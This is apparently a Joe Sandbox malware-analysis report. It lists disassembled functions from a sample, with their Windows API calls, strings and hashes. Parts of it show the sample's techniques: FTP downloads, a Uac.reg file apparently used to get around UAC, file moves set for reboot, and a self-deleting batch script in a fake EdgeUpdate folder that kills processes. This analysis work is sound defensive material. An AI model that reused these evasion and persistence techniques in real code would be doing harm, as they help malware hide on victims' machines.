Instruction Fuzzy Hash: D1B19E79800209EFCF1DDFA5CA869AFB775BF04312B28459AE8016B391D731D921CF95

Function 10018F89 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,100107FA), ref: 10018FF6
GetStdHandle.KERNEL32(000000F4,10027B2C,00000000,?,00000000,100107FA), ref: 100190CC
WriteFile.KERNEL32(00000000), ref: 100190D3

Strings

..., xrefs: 10019048
Runtime Error!Program: , xrefs: 1001905C
Microsoft Visual C++ Runtime Library, xrefs: 100190A2
<program name unknown>, xrefs: 10019006

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: File$HandleModuleNameWrite
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 3784150691-4022980321
Opcode ID: 6effebe2144ac5f5118b75c0b6117480a04e7cdaab49bb81790a0079ef059b38
Instruction ID: 0837cb8062238e84bca2e027c3180ca87a6a59fb9ebe609f3881ba0324ae0afa
Opcode Fuzzy Hash: 6effebe2144ac5f5118b75c0b6117480a04e7cdaab49bb81790a0079ef059b38
Instruction Fuzzy Hash: 4A31D372A00218AFEF22DAA0DC46FDA77ADFF49340F500556F649EA041E770FAC58B52

Function 10007436 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 93fileCOMMON

Download Yara Rule

APIs

SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001C,00000000), ref: 10007484
CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 100074EB
GetFileSize.KERNEL32(000000FF,00000000), ref: 1000750D
ReadFile.KERNEL32(000000FF,?,00000000,00000000,00000000), ref: 1000754F

Part of subcall function 100073CB: LocalAlloc.KERNEL32(00000040,?), ref: 100073EA
Part of subcall function 100073CB: LocalFree.KERNEL32(?,?,?), ref: 10007427

CloseHandle.KERNEL32(000000FF), ref: 10007590

Strings

.dat, xrefs: 100074BE
Default, xrefs: 1000748A, 100074AE

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFolderFreeHandlePathReadSizeSpecial
String ID: .dat$Default
API String ID: 3272996501-889281589
Opcode ID: 74c4622d699b02ad7691ca95f1e79f1c309cdefddf93f130b0d4169e2c479caa
Instruction ID: fe9cf4e28221b89465fd2dce16e46ce6d4285bc0af2ddc76d036d35ca872914d
Opcode Fuzzy Hash: 74c4622d699b02ad7691ca95f1e79f1c309cdefddf93f130b0d4169e2c479caa
Instruction Fuzzy Hash: 84313BB5D00218ABDB24DB54CC46BDAB7B8AB58300F1086D9F60DA7280D7B4ABD5CF91

Function 10009AFA Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67networkfileCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(WinInet Ftp,00000000,00000000,00000000,00000000), ref: 10009B45
InternetConnectA.WININET(?,00000000,00000000,00000000,00000000,00000001,08000000,00000000), ref: 10009B69
FtpSetCurrentDirectoryA.WININET(00000000,00000000), ref: 10009B84
FtpGetFileA.WININET(00000000,00000000,?,00000000,00000020,80000000,00000000), ref: 10009BA1
InternetCloseHandle.WININET(00000000), ref: 10009BB4
InternetCloseHandle.WININET(?), ref: 10009BBE

Strings

WinInet Ftp, xrefs: 10009B40

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$ConnectCurrentDirectoryFileOpen
String ID: WinInet Ftp
API String ID: 882852640-4111641053
Opcode ID: da8c5f188ffcf62bdb1d670e1903d4618f2151efac6f424d80d6910179126a9d
Instruction ID: 13d6c37438cd2f2785d719286d6a66ec563c0f16e6b216198379bde9c5a19bb0
Opcode Fuzzy Hash: da8c5f188ffcf62bdb1d670e1903d4618f2151efac6f424d80d6910179126a9d
Instruction Fuzzy Hash: E221EE71A00209ABEB14DFA4CC99BDEBBB4FB4C714F204518F615BB280C3B5A545CBA4

Function 10004D69 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38sleepfileCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,000000E1), ref: 10004DA7
CopyFileA.KERNEL32(?,?,00000000), ref: 10004DBD

Part of subcall function 10004D06: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 10004D23
Part of subcall function 10004D06: WriteFile.KERNEL32(000000FF,1002DE7C,000000F5,?,00000000), ref: 10004D4A
Part of subcall function 10004D06: CloseHandle.KERNEL32(000000FF), ref: 10004D5C

Sleep.KERNEL32(00000294), ref: 10004DD7
Sleep.KERNEL32(000003E8), ref: 10004DE2
DeleteFileA.KERNEL32(Uac.reg), ref: 10004DED

Strings

Uac.reg, xrefs: 10004D73
Uac.reg, xrefs: 10004DE8

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: File$Sleep$CloseCopyCreateDeleteHandleModuleNameWrite
String ID: Uac.reg$Uac.reg
API String ID: 3965208581-1569404392
Opcode ID: ea6974e6b2e352edf90b5c4a809fd7d183da3b6432a71dc96f8eebcdbf85882e
Instruction ID: 23636800b342fa030a67befcc27607dd7fedd10ccbdd6da6910e68db79a18797
Opcode Fuzzy Hash: ea6974e6b2e352edf90b5c4a809fd7d183da3b6432a71dc96f8eebcdbf85882e
Instruction Fuzzy Hash: 4501A2769403259BE750DB64CD89FDEB378FB58300F0041A6F609921A1DF706A858B52

Function 10004F37 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 35fileCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 10004F53
GetSystemDirectoryA.KERNEL32(?,00000104), ref: 10004F65
GetTickCount.KERNEL32 ref: 10004F6B
wsprintfA.USER32 ref: 10004F85
MoveFileA.KERNEL32(?,?), ref: 10004F9C
MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 10004FAD

Strings

%s\%d.bak, xrefs: 10004F79

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: File$Move$CountDirectoryModuleNameSystemTickwsprintf
String ID: %s\%d.bak
API String ID: 830686190-2116986511
Opcode ID: f8b4e98621493d8a66aebd7412754b742a3ecd4b42b40548e795ad511c0e476f
Instruction ID: dceb519888c5e5627d1e39a85b94b856a7d97d3e77612ff370b23a68aaae4bb2
Opcode Fuzzy Hash: f8b4e98621493d8a66aebd7412754b742a3ecd4b42b40548e795ad511c0e476f
Instruction Fuzzy Hash: 6FF031B6500228ABE750DBA0CCC9EEA773CAB48305F400685F75596061DFB55688CF61

Function 100089B0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 17sleepprocessCOMMON

Download Yara Rule

APIs

Part of subcall function 10003A76: CreateFileA.KERNEL32(10002209,40000000,00000001,00000000,00000002,00000000,00000000,?,10002209), ref: 10003A93
Part of subcall function 10003A76: WriteFile.KERNEL32(000000FF,C:\\xxx.exe,0000000B,10002209,00000000), ref: 10003AB7
Part of subcall function 10003A76: CloseHandle.KERNEL32(000000FF), ref: 10003AC9

Sleep.KERNEL32(000001F4), ref: 100089C5

Part of subcall function 10003A13: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 10003A30
Part of subcall function 10003A13: WriteFile.KERNEL32(000000FF,@echo off 2>nul 3>nultaskkill /im rundll32.exe /ftaskkill /im rundll32.exe /ftaskkill /im iXXX3XXX.exe /ftaskkill /im rundll32.exe /ftaskkill /im rundll32.exe /ftaskkill /im iXXX3XXX.exe /ftaskkill /im iXXX3XXX.exe /fAttrib C:\xxxx.INST.INI -,00000874,?,00000000), ref: 10003A57
Part of subcall function 10003A13: CloseHandle.KERNEL32(000000FF), ref: 10003A69

WinExec.KERNEL32(C:\ProgramData\Microsoft\EdgeUpdate\Log\del.bat,00000000), ref: 100089DF
Sleep.KERNEL32(000001F4), ref: 100089EA
ExitProcess.KERNEL32 ref: 100089F2

Strings

C:\ProgramData\Microsoft\EdgeUpdate\Log\del.bat, xrefs: 100089DA
C:\ProgramData\Microsoft\EdgeUpdate\Log\del.bat, xrefs: 100089CB
c:\del, xrefs: 100089B3

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSleepWrite$ExecExitProcess
String ID: C:\ProgramData\Microsoft\EdgeUpdate\Log\del.bat$C:\ProgramData\Microsoft\EdgeUpdate\Log\del.bat$c:\del
API String ID: 1851324737-122815619
Opcode ID: 692d8ed2c874c622cbbb638c1acd6fd58a2b0eea5cc79d74e6098cdc0a7fa8a7
Instruction ID: f06e7f43746e883e82a6882750b37d0069f9fe23ccff20287054db7e22bc22a3
Opcode Fuzzy Hash: 692d8ed2c874c622cbbb638c1acd6fd58a2b0eea5cc79d74e6098cdc0a7fa8a7
Instruction Fuzzy Hash: 3ED01776689612ABF21167E08D8BB8E3A18FB16712F204071F30A940E1EBA024494667

Function 10018E18 Relevance: 12.1, APIs: 8, Instructions: 132COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,10013940), ref: 10018E33
GetEnvironmentStrings.KERNEL32(?,?,?,?,10013940), ref: 10018E47
GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,10013940), ref: 10018E73
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?,10013940), ref: 10018EAB
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,10013940), ref: 10018ECD
FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,10013940), ref: 10018EE6
GetEnvironmentStrings.KERNEL32(?,?,?,?,?,?,10013940), ref: 10018EF9
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 10018F37

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: EnvironmentStrings$ByteCharFreeMultiWide
String ID:
API String ID: 1823725401-0
Opcode ID: 871083d5ae81a96d255faaecf547b96d01e7b73b8be34e4e68435096ae7e5913
Instruction ID: d0a6cdfa12f2fbc65ba222c537ffc2ef239775568f27a83d97b607e6e618d994
Opcode Fuzzy Hash: 871083d5ae81a96d255faaecf547b96d01e7b73b8be34e4e68435096ae7e5913
Instruction Fuzzy Hash: 6131A1B25042665FE350EF784CC882B76DEEB49294722057DF955DB101E631DFC28761

Function 10004FB7 Relevance: 12.1, APIs: 8, Instructions: 99processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10004FE0
Process32First.KERNEL32(000000FF,00000128), ref: 10005030
CloseHandle.KERNEL32(000000FF,000000FF,00000128,00000002,00000000), ref: 10005040

Part of subcall function 10021051: InterlockedDecrement.KERNEL32(-000000F4), ref: 10021065

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: CloseCreateDecrementFirstHandleInterlockedProcess32SnapshotToolhelp32
String ID:
API String ID: 4225765983-0
Opcode ID: 0636e924dbd42a2d9e5fff8857097f6ccc458ae3680ac0e5647a733e2a5a93f4
Instruction ID: ccd932a8cb6dd2855a3d90610b6ecb6ddf92ee484baf2310c1576a10e71e8401
Opcode Fuzzy Hash: 0636e924dbd42a2d9e5fff8857097f6ccc458ae3680ac0e5647a733e2a5a93f4
Instruction Fuzzy Hash: 4C410374900268EBDB24DB64CD89BDEB7B4EB08350F6042D8E5196B291DB75AFC5CF80

Function 035A7ABF Relevance: 10.8, APIs: 7, Instructions: 329COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 035A7B45

Memory Dump Source

Source File: 00000007.00000002.3509857649.00000000035A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_35a0000_lXAMaI.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 997eec0b2247382cef059adc6b3556d183c695bd91af5b88ab168f2d3406e371
Instruction ID: ebf014b5c83a7a135c673e9d569541d45b95abd7d879b07b17a5234227c09454
Opcode Fuzzy Hash: 997eec0b2247382cef059adc6b3556d183c695bd91af5b88ab168f2d3406e371
Instruction Fuzzy Hash: EAB13672A00B569FDB11CFACEC81BBEBBB5FF49310F194595E804AF291E2749901D7A0

Function 03607ABF Relevance: 10.8, APIs: 7, Instructions: 329COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 03607B45

Memory Dump Source

Source File: 00000007.00000002.3509918905.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3600000_lXAMaI.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 997eec0b2247382cef059adc6b3556d183c695bd91af5b88ab168f2d3406e371
Instruction ID: 2e3d8c7a29771a8979b3312e6fcc5db869cba5e4632ff8edbf22dfdc9c6a5fb4
Opcode Fuzzy Hash: 997eec0b2247382cef059adc6b3556d183c695bd91af5b88ab168f2d3406e371
Instruction Fuzzy Hash: 25B1F272A003559FDB19CF68CC82BABBBA5EF56310F188595E914AF3C1E374A901C7A4

Function 1001A9A4 Relevance: 10.7, APIs: 7, Instructions: 186processsynchronizationCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,00000000,00000000,00000001,?,?,00000000,?,?), ref: 1001AB0B
GetLastError.KERNEL32 ref: 1001AB13
WaitForSingleObject.KERNEL32(?,000000FF), ref: 1001AB50
GetExitCodeProcess.KERNEL32(?,?), ref: 1001AB5D
CloseHandle.KERNEL32(?), ref: 1001AB66
CloseHandle.KERNEL32(?), ref: 1001AB73
CloseHandle.KERNEL32(10017035), ref: 1001AB83

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: CloseHandle$Process$CodeCreateErrorExitLastObjectSingleWait
String ID:
API String ID: 966596688-0
Opcode ID: 6bd2b9e6d70d3fbd5f7f9a1619408e7f498436d22b76d796a7dc39240689a2ab
Instruction ID: ff45c5b201949bca3e3140a2246a60dffc172b43f064ff89ba0faa373359da93
Opcode Fuzzy Hash: 6bd2b9e6d70d3fbd5f7f9a1619408e7f498436d22b76d796a7dc39240689a2ab
Instruction Fuzzy Hash: 006111318042999FDB12CFA8CC80A9EBBF5FF46320F254156E4219F192C774E8C5CB51

Function 02E3AA58 Relevance: 10.7, APIs: 7, Instructions: 179COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3509189589.0000000002E1C000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true

Associated: 00000007.00000002.3509065255.0000000002DE0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3509093359.0000000002DE1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3509129783.0000000002DFD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3509159172.0000000002E06000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3509228018.0000000002E45000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3509260744.0000000002E4B000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3509506069.00000000030AF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2de0000_lXAMaI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0e191af02d4cc3741522afc239ac6cae62b903d27c1eb9892efbe6f6422aaae
Instruction ID: 4efcc06e6783077282b6f2f0b96caa2e9fe755500a32fa168f0e9cb54c1fcd51
Opcode Fuzzy Hash: f0e191af02d4cc3741522afc239ac6cae62b903d27c1eb9892efbe6f6422aaae
Instruction Fuzzy Hash: 06511871DC06149ACF23AB258C4CAEE7667AF4076AB15E535F8956B380DB3488C0CF94

Function 02DE5890 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 148COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 02DE58C7
___except_validate_context_record.LIBVCRUNTIME ref: 02DE58CF
_ValidateLocalCookies.LIBCMT ref: 02DE5958
__IsNonwritableInCurrentImage.LIBCMT ref: 02DE5983
_ValidateLocalCookies.LIBCMT ref: 02DE59D8

Strings

csm, xrefs: 02DE596D

Memory Dump Source

Source File: 00000007.00000002.3509093359.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true

Associated: 00000007.00000002.3509065255.0000000002DE0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3509129783.0000000002DFD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3509159172.0000000002E06000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3509189589.0000000002E1C000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3509228018.0000000002E45000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3509260744.0000000002E4B000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3509506069.00000000030AF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2de0000_lXAMaI.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 0a1b889a6d7e036e291e6425fb5390d6c8656fbc828f80f9a175f0781898bf90
Instruction ID: ca4422ec36251dfe0019acd9a59631474ae25465ed41046a858ed074f52e6bec
Opcode Fuzzy Hash: 0a1b889a6d7e036e291e6425fb5390d6c8656fbc828f80f9a175f0781898bf90
Instruction Fuzzy Hash: 4D51A434A002089BCF10EF68ECC0AEE7BA6EF4536CF948155E85A9B351D732DD15CBA1

Function 035A1437 Relevance: 10.6, APIs: 7, Instructions: 136COMMONLIBRARYCODE

Download Yara Rule

APIs

__RTC_Initialize.LIBCMT ref: 035A147E
___scrt_uninitialize_crt.LIBCMT ref: 035A1498

Memory Dump Source

Source File: 00000007.00000002.3509857649.00000000035A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_35a0000_lXAMaI.jbxd

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: b81f753e5fa80cff7be78ccfcbb0393cdf6851c8ee33d715b0b47f0718f3d970
Instruction ID: 7f6a5db191953a8084f12735fc40bdd441b97992c93ff204a21a3073bcb3e172
Opcode Fuzzy Hash: b81f753e5fa80cff7be78ccfcbb0393cdf6851c8ee33d715b0b47f0718f3d970
Instruction Fuzzy Hash: 5341A775D00F19AFDB21EF5DE840BAE7AB9FB846A0F044115E8165B270D7708B41BFA0

Function 03601437 Relevance: 10.6, APIs: 7, Instructions: 136COMMONLIBRARYCODE

Download Yara Rule

APIs

__RTC_Initialize.LIBCMT ref: 0360147E
___scrt_uninitialize_crt.LIBCMT ref: 03601498

Memory Dump Source

Source File: 00000007.00000002.3509918905.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3600000_lXAMaI.jbxd

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: ca62506ecfbbabba91acb89ff0a8f71637b56106ffd8d65775c1cb903e69fb61
Instruction ID: d5e9f354ca1c2015b28a12c8901d16d29780ce8c2e4da03982303b8f63d7fb8e
Opcode Fuzzy Hash: ca62506ecfbbabba91acb89ff0a8f71637b56106ffd8d65775c1cb903e69fb61
Instruction Fuzzy Hash: 0141DABDD00318ABDB2ADFD5C94276F7668EB46764F04411DF8165F3D0D73489418BA4

Function 035A1F00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 035A1F37
___except_validate_context_record.LIBVCRUNTIME ref: 035A1F3F
_ValidateLocalCookies.LIBCMT ref: 035A1FC8
__IsNonwritableInCurrentImage.LIBCMT ref: 035A1FF3
_ValidateLocalCookies.LIBCMT ref: 035A2048

Strings

csm, xrefs: 035A1FDD

Memory Dump Source

Source File: 00000007.00000002.3509857649.00000000035A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_35a0000_lXAMaI.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 3b4c72c1a0355d7fd47bbe31f73e851992f2035e9b7cfd04941569088b9a4f7a
Instruction ID: 85c5c27f46bed7b2c718a16535724cccf797796d5f5775fc8dc06bf2f3bc60de
Opcode Fuzzy Hash: 3b4c72c1a0355d7fd47bbe31f73e851992f2035e9b7cfd04941569088b9a4f7a
Instruction Fuzzy Hash: BC418438A00A499FCF10DF6DE880AAEBBF5BF45314F148555E8145F272E731DA05EBA0

Function 03601F00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 03601F37
___except_validate_context_record.LIBVCRUNTIME ref: 03601F3F
_ValidateLocalCookies.LIBCMT ref: 03601FC8
__IsNonwritableInCurrentImage.LIBCMT ref: 03601FF3
_ValidateLocalCookies.LIBCMT ref: 03602048

Strings

csm, xrefs: 03601FDD

Memory Dump Source

Source File: 00000007.00000002.3509918905.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3600000_lXAMaI.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: a70bbb8219dc94cd42caea9459c3ba54cee59edd0129df8b31531f1b282cf4a5
Instruction ID: 02d79468cfada5da01a54a8f369b9e02b152a2c1260f0b4d1bd98dc6177e9130
Opcode Fuzzy Hash: a70bbb8219dc94cd42caea9459c3ba54cee59edd0129df8b31531f1b282cf4a5
Instruction Fuzzy Hash: 3541B138A002089BCF18DF68C895A9FBBF5AF06314F188459E8159B3D2D771D951CB94

Function 035AA86A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

